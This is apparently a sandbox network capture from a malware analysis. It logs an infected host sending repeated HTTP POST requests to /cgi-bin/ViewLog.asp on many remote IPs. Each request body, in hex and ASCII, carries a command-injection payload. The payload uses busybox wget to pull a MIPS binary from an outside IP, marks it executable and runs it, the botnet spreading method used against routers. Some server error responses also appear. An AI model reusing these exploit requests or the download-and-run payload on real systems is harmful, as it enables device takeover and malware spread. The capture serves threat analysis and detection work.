                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              165192.168.2.135389862.29.57.1748080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:46.649796009 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              166192.168.2.134237294.120.157.1258080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:46.649998903 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              167192.168.2.134355662.31.227.1808080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:46.845906019 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:47.061398029 CET567INHTTP/1.1 503 Service Unavailable
                                              Content-Type: text/html; charset=us-ascii
                                              Server: Microsoft-HTTPAPI/2.0
                                              Date: Thu, 23 Nov 2023 04:15:46 GMT
                                              Connection: close
                                              Content-Length: 326
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 35 30 33 2e 20 54 68 65 20 73 65 72 76 69 63 65 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Service Unavailable</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Service Unavailable</h2><hr><p>HTTP Error 503. The service is unavailable.</p></BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              168192.168.2.134710694.156.189.988080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:50.298234940 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              169192.168.2.134871431.200.43.228080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:50.310061932 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              170192.168.2.134299294.120.26.2348080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:50.312849998 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              171192.168.2.135866494.121.110.1428080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:50.315035105 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              172192.168.2.135285094.122.229.2328080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:50.330723047 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              173192.168.2.134057094.121.116.458080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:50.533696890 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              174192.168.2.134273094.120.208.1198080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:50.538551092 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              175192.168.2.135839295.86.123.1268080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:50.563504934 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              176192.168.2.134387031.136.25.1888080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:50.944538116 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:51.526580095 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:52.678589106 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:55.174751043 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:59.782780886 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:08.998606920 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:27.686494112 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:04.550467014 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              177192.168.2.135892894.198.129.1718080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:50.962941885 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:51.168313026 CET369INHTTP/1.0 401 Unauthorized
                                              Server: httpd
                                              Date: Thu, 23 Nov 2023 04:15:51 GMT
                                              WWW-Authenticate: Basic realm="MI-3"
                                              Content-Type: text/html
                                              Connection: close
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 48 34 3e 0a 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 72 65 71 75 69 72 65 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>Authorization required.</BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              178192.168.2.135567085.53.193.338080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:50.963473082 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:51.169353962 CET475INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:15:57 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 226
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
